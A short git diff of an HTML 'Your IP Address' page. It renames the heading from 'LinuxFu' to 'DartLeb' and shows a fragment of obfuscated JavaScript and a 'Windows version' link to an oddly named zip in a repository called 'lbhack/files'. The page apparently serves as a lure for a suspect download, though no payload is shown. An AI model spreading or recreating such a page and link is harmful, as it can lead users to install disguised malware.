--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@ var v=F;function M(){var O=['40DyXUko','10KHCOUQ','https://api.ipify.org?format=
 </head>
 <body>
     <center>
-        <h1>LinuxFu</h1>
+        <h1>DartLeb</h1>
         <h3>Your IP Address:</h3>
     <p id="gfg"></p>
     <a href="https://github.com/lbhack/files/raw/main/syrafalira.zip">Windows version</a>
